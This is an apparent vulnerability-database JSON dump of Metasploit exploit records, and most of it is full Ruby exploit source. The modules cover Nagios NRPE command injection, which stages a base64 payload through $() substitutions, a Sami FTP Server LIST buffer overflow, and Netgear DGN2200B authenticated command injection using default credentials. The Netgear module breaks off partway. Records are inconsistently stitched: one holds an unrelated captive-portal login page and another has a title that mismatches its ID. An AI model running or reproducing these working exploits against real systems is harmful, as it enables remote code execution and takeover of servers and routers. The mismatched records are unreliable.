"OPENVAS:1361412562310865756", "OPENVAS:850457", "OPENVAS:1361412562310121262"]}, {"type": "nessus", "idList": ["FEDORA_2013-9829.NASL", "FEDORA_2013-9848.NASL", "FEDORA_2013-9836.NASL", "NAGIOS_NRPE_2_14.NASL", "SUSE_11_NAGIOS-NRPE-130710.NASL", "OPENSUSE-2013-301.NASL", "ALA_ALAS-2013-203.NASL", "GENTOO_GLSA-201408-18.NASL"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2013:0624-1", "SUSE-SU-2013:1219-1", "OPENSUSE-SU-2013:0621-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:120507", "PACKETSTORM:121287"]}, {"type": "exploitdb", "idList": ["EDB-ID:24955"]}, {"type": "zdt", "idList": ["1337DAY-ID-20645"]}, {"type": "amazon", "idList": ["ALAS-2013-203"]}, {"type": "saint", "idList": ["SAINT:191B282062BFEBFDC0EBFA60A2FDED78", "SAINT:E0F846270087DB671556237BDF17DDDE", "SAINT:21BB3E24EB9AE6BD8636B7F5A2A455A3"]}, {"type": "gentoo", "idList": ["GLSA-201408-18"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12910"]}], "modified": "2019-07-14T18:24:19"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "<!DOCTYPE html>\n<html>\n<head>\n\t<meta charset=\"UTF-8\" />\n\t<meta content=\"\" name=\"csrf-token\" />\n\t<meta content=\"width=device-width, initial-scale=1\" name=\"viewport\" />\n\t<title>Lightspeed System - Web Access</title>\n\t<link rel=\"stylesheet\" href=\"/css/access/access.css\" type=\"text/css\" />\n\t<link rel=\"icon\" href=\"/images/favicon.ico\" type=\"image/x-icon\" />\n</head>\n\n<script type='text/javascript'>\n\twindow.onload = function(){\n\t\tvar form = document.getElementById(\"login_form\");\n\t\tdocument.getElementById(\"submit_link\").addEventListener(\"click\", function(){\n\t\t\tform.submit();\n\t\t});\n\t};\n\n\tfunction enter_submit(e) {\n\t\tif (e && e.keyCode == 13) {\n\t\t\tvar form = document.getElementById(\"login_form\");\n\t\t\tform.submit();\n\t\t}\n\t}\n</script>\n\n<body>\n\t<div class=\"page-icon\">\n\t\t<div class=\"page-icon--img page-icon--imgAccess\">\n\t\t</div>\n\t</div>\n\n\t\n\n\t<div class=\"strip\"><h1>Captive Portal</h1>\n\t</div>\n\n\t<div>\n\t\t<p class=\"text--blueGray\">Please login to browse the internet.</p>\n\t</div>\n\n\t\n\n\t<div class=\"override\">\n\t\t<form id=\"login_form\" class=\"form\" action=\"/access/portal\" method=\"post\">\n\t\t\t<span onkeyup=\"enter_submit(event);\">\n\t\t\t\t<input type=\"hidden\" name=\"auth_source_id\", value=\"3\">\n\t\t\t\t<input type=\"hidden\" name=\"id\" value=\"EL58JZNWBX7ALBUJ81LO1HC6NY6UB1JQ\" />\n\t\t\t\t<input type=\"text\" name=\"username\" placeholder=\"Username\" />\n\t\t\t\t<input type=\"password\" name=\"password\" placeholder=\"Password\" />\n\t\t\t</span>\n\t\t\t<a id=\"submit_link\" class=\"button button--blue\" href=\"#\">Login</a>\n\t\t\t<br/><br/>\n\n\t\t\t\n\n\t\t\t<div class=\"signinForm-options l-flex l-flex--vAlignBaseline\">\n\t\t\t\t<div class=\"l-flex-item--allotWidth\">\n\t\t\t\t\t<section class=\"signinSSOButtons signinSSOButtons--noAnimation\">\n\t\t\t\t\t\t\n\t\t\t\t\t</section>\n\t\t\t\t</div>\n\t\t\t</div>\n\t\t</form>\n\t</div>\n\n\t\n</body>\n</html>\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-14T18:24:19", "differentElements": ["sourceData"], "edition": 102}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "b8fd29a158b5b91d5ab7a065082cbc04", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.\n", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1362", "http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability"], "cvelist": ["CVE-2013-1362"], "lastseen": "2019-07-14T20:23:37", "history": [], "viewCount": 127, "enchantments": {"score": {"value": 8.7, "vector": "NONE", "modified": "2019-07-14T20:23:37"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1362"]}, {"type": "exploitdb", "idList": ["EDB-ID:24955"]}, {"type": "openvas", "idList": ["OPENVAS:865756", "OPENVAS:1361412562310850457", "OPENVAS:1361412562310120026", "OPENVAS:1361412562310850460", "OPENVAS:865802", "OPENVAS:850457", "OPENVAS:1361412562310865802", "OPENVAS:850460", "OPENVAS:1361412562310865756", "OPENVAS:1361412562310121262"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:121287", "PACKETSTORM:120507"]}, {"type": "amazon", "idList": ["ALAS-2013-203"]}, {"type": "zdt", "idList": ["1337DAY-ID-20645"]}, {"type": "suse", "idList": ["SUSE-SU-2013:1219-1", "OPENSUSE-SU-2013:0624-1", "OPENSUSE-SU-2013:0621-1"]}, {"type": "nessus", "idList": ["FEDORA_2013-9848.NASL", "FEDORA_2013-9829.NASL", "OPENSUSE-2013-301.NASL", "ALA_ALAS-2013-203.NASL", "SUSE_11_NAGIOS-NRPE-130710.NASL", "NAGIOS_NRPE_2_14.NASL", "FEDORA_2013-9836.NASL", "GENTOO_GLSA-201408-18.NASL"]}, {"type": "saint", "idList": ["SAINT:E0F846270087DB671556237BDF17DDDE", "SAINT:191B282062BFEBFDC0EBFA60A2FDED78", "SAINT:21BB3E24EB9AE6BD8636B7F5A2A455A3"]}, {"type": "gentoo", "idList": ["GLSA-201408-18"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12910"]}], "modified": "2019-07-14T20:23:37"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-14T20:23:37", "differentElements": ["cvelist", "cvss", "description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 103}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "aacf6fb7f493d995b9e85bda84c24055", "type": "metasploit", "bulletinFamily": "exploit", "title": "Sami FTP Server LIST Command Buffer Overflow", "description": "This module exploits a stack based buffer overflow on Sami FTP Server 2.0.1. The vulnerability exists in the processing of LIST commands. In order to trigger the vulnerability, the \"Log\" tab must be viewed in the Sami FTP Server managing application, in the target machine. On the other hand, the source IP address used to connect with the FTP Server is needed. If the user can't provide it, the module will try to resolve it. This module has been tested successfully on Sami FTP Server 2.0.1 over Windows XP SP3.\n", "published": "2013-03-13T21:27:02", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-25T00:50:00", "history": [], "viewCount": 127, "enchantments": {"score": {"value": 6.3, "vector": "NONE", "modified": "2019-07-25T00:50:00"}, "dependencies": {"references": [{"type": "impervablog", "idList": ["IMPERVABLOG:AF2AAA49E9DD7BE427896C13739AB1F5"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:353CB4603C296A43DDDDDAE6CAC6BE25"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310142662", "OPENVAS:1361412562310891863", "OPENVAS:1361412562310891862", "OPENVAS:1361412562310704486", "OPENVAS:1361412562310704485"]}, {"type": "oraclelinux", "idList": ["ELSA-2019-1840", "ELSA-2019-1839", "ELSA-2019-1777"]}, {"type": "exploitdb", "idList": ["EDB-ID:47154"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1794-1", "OPENSUSE-SU-2019:1793-1"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1863-1:26EA8", "DEBIAN:DLA-1862-1:8E150"]}, {"type": "thn", "idList": ["THN:AB717FBC8FF7C7C1D194A126C788DF50"]}, {"type": "threatpost", "idList": ["THREATPOST:5049F818B995E5121EDA184A34A957E6"]}, {"type": "cve", "idList": ["CVE-2019-11693"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "kitploit", "idList": ["KITPLOIT:1450641854881225942"]}], "modified": "2019-07-25T00:50:00"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/ftp/sami_ftpd_list.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = LowRanking\n\n include Msf::Exploit::Remote::Ftp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name'\t\t\t => 'Sami FTP Server LIST Command Buffer Overflow',\n 'Description'\t => %q{\n This module exploits a stack based buffer overflow on Sami FTP Server 2.0.1.\n The vulnerability exists in the processing of LIST commands. In order to trigger\n the vulnerability, the \"Log\" tab must be viewed in the Sami FTP Server managing\n application, in the target machine. On the other hand, the source IP address used\n to connect with the FTP Server is needed. If the user can't provide it, the module\n will try to resolve it. This module has been tested successfully on Sami FTP Server\n 2.0.1 over Windows XP SP3.\n },\n 'Platform'\t\t => 'win',\n 'Author'\t\t =>\n [\n 'superkojiman', # Original exploit\n 'Doug Prostko <dougtko[at]gmail.com>' # MSF module\n ],\n 'License'\t\t => MSF_LICENSE,\n 'References'\t =>\n [\n [ 'OSVDB', '90815'],\n [ 'BID', '58247'],\n [ 'EDB', '24557']\n ],\n 'Privileged'\t => false,\n 'Payload'\t\t =>\n {\n 'Space' => 1500,\n 'DisableNops' => true,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x5c\",\n 'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n },\n 'Targets'\t\t =>\n [\n [ 'Sami FTP Server 2.0.1 / Windows XP SP3',\n {\n 'Ret' => 0x10028283, # jmp esp from C:\\Program Files\\PMSystem\\Temp\\tmp0.dll\n 'Offset' => 228\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 27 2013'))\n register_options(\n [\n OptAddress.new('SOURCEIP', [false, 'The local client address'])\n ])\n end\n\n def exploit\n connect\n if datastore['SOURCEIP']\n ip_length = datastore['SOURCEIP'].length\n else\n ip_length = Rex::Socket.source_address(rhost).length\n end\n buf = rand_text(target['Offset'] - ip_length)\n buf << [ target['Ret'] ].pack('V')\n buf << rand_text(16)\n buf << payload.encoded\n send_cmd( ['LIST', buf], false )\n disconnect\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-25T00:50:00", "differentElements": ["cvelist", "cvss", "description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 104}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "b8fd29a158b5b91d5ab7a065082cbc04", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.\n", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1362", "http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability"], "cvelist": ["CVE-2013-1362"], "lastseen": "2019-07-25T03:09:02", "history": [], "viewCount": 127, "enchantments": {"score": {"value": 8.7, "vector": "NONE", "modified": "2019-07-25T03:09:02"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1362"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310850457", "OPENVAS:865756", "OPENVAS:1361412562310850460", "OPENVAS:1361412562310120026", "OPENVAS:865802", "OPENVAS:850457", "OPENVAS:1361412562310865802", "OPENVAS:850460", "OPENVAS:1361412562310865756", "OPENVAS:1361412562310121262"]}, {"type": "exploitdb", "idList": ["EDB-ID:24955"]}, {"type": "nessus", "idList": ["FEDORA_2013-9848.NASL", "FEDORA_2013-9829.NASL", "OPENSUSE-2013-301.NASL", "NAGIOS_NRPE_2_14.NASL", "SUSE_11_NAGIOS-NRPE-130710.NASL", "FEDORA_2013-9836.NASL", "ALA_ALAS-2013-203.NASL", "GENTOO_GLSA-201408-18.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-20645"]}, {"type": "amazon", "idList": ["ALAS-2013-203"]}, {"type": "suse", "idList": ["SUSE-SU-2013:1219-1", "OPENSUSE-SU-2013:0624-1", "OPENSUSE-SU-2013:0621-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:121287", "PACKETSTORM:120507"]}, {"type": "saint", "idList": ["SAINT:E0F846270087DB671556237BDF17DDDE", "SAINT:191B282062BFEBFDC0EBFA60A2FDED78", "SAINT:21BB3E24EB9AE6BD8636B7F5A2A455A3"]}, {"type": "gentoo", "idList": ["GLSA-201408-18"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12910"]}], "modified": "2019-07-25T03:09:02"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-25T03:09:02", "differentElements": ["cvelist", "cvss", "description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 105}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "a4df64b95528f30e9d7136456938762e", "type": "metasploit", "bulletinFamily": "exploit", "title": "Netgear DGN2200B pppoe.cgi Remote Command Execution", "description": "Some Netgear Routers are vulnerable to an authenticated OS command injection on their web interface. Default credentials for the web interface are admin/admin or admin/password. Since it is a blind os command injection vulnerability, there is no output for the executed command when using the cmd generic payload. A ping command against a controlled system could be used for testing purposes. This module overwrites parts of the PPOE configuration, while the module tries to restore it after exploitation configuration backup is recommended.\n", "published": "2013-04-03T08:32:52", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://www.s3cur1ty.de/m1adv2013-015"], "cvelist": [], "lastseen": "2019-07-29T10:52:05", "history": [], "viewCount": 127, "enchantments": {"score": {"value": 5.3, "vector": "NONE", "modified": "2019-07-29T10:52:05"}, "dependencies": {"references": [{"type": "packetstorm", "idList": ["PACKETSTORM:153782", "PACKETSTORM:153781", "PACKETSTORM:153772", "PACKETSTORM:153771", "PACKETSTORM:153770"]}, {"type": "cve", "idList": ["CVE-2019-10267", "CVE-2019-14284", "CVE-2019-14283", "CVE-2018-20855", "CVE-2018-20856", "CVE-2018-20854"]}, {"type": "thn", "idList": ["THN:5BC8F1A67A1CCC7511A6D85B8051C8F3"]}, {"type": "kitploit", "idList": ["KITPLOIT:694607214883016670"]}, {"type": "freebsd", "idList": ["38D2DF4D-B143-11E9-87E7-901B0E934D69"]}, {"type": "exploitdb", "idList": ["EDB-ID:47179", "EDB-ID:47181", "EDB-ID:47180"]}, {"type": "amazon", "idList": ["ALAS-2019-1252", "ALAS-2019-1246", "ALAS-2019-1244"]}], "modified": "2019-07-29T10:52:05"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Netgear DGN2200B pppoe.cgi Remote Command Execution',\n 'Description' => %q{\n Some Netgear Routers are vulnerable to an authenticated OS command injection\n on their web interface. Default credentials for the web interface are admin/admin\n or admin/password. Since it is a blind os command injection vulnerability, there\n is no output for the executed command when using the cmd generic payload. A ping\n command against a controlled system could be used for testing purposes. This module\n overwrites parts of the PPOE configuration, while the module tries to restore it\n after exploitation configuration backup is recommended.\n },\n 'Author' =>\n [\n 'Michael Messner <devnull[at]s3cur1ty.de>', # Vulnerability discovery and Metasploit module\n 'juan vazquez' # minor help with msf module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'BID', '57998' ],\n [ 'EDB', '24513' ],\n [ 'OSVDB', '90320' ],\n [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-015' ]\n ],\n 'DisclosureDate' => 'Feb 15 2013',\n 'Privileged' => true,\n 'Platform' => %w{ linux unix },\n 'Payload' =>\n {\n 'DisableNops' => true\n },\n 'Targets' =>\n [\n [ 'CMD',\n {\n 'Arch' => ARCH_CMD,\n 'Platform' => 'unix'\n }\n ],\n [ 'Linux mipsbe Payload',\n {\n 'Arch' => ARCH_MIPSBE,\n 'Platform' => 'linux'\n }\n ],\n ],\n 'DefaultTarget' => 1\n ))\n\n register_options(\n [\n OptString.new('HttpUsername', [ true, 'The username to authenticate as', 'admin' ]),\n OptString.new('HttpPassword', [ true, 'The password for the specified username', 'password' ]),\n OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]),\n OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]),\n OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60]),\n OptInt.new('RELOAD_CONF_DELAY', [true, 'Time to wait to allow the remote device to load configuration', 45])\n ])\n end\n\n def get_config(config, pattern)\n if config =~ /#{pattern}/\n #puts \"[*] #{$1}\"\t#debugging\n return $1\n end\n return \"\"\n end\n\n def grab_config(user,pass)\n print_status(\"#{rhost}:#{rport} - Trying to download the original configuration\")\n begin\n res = send_request_cgi({\n 'uri' => '/BAS_pppoe.htm',\n 'method' => 'GET',\n 'authorization' => basic_auth(user,pass)\n 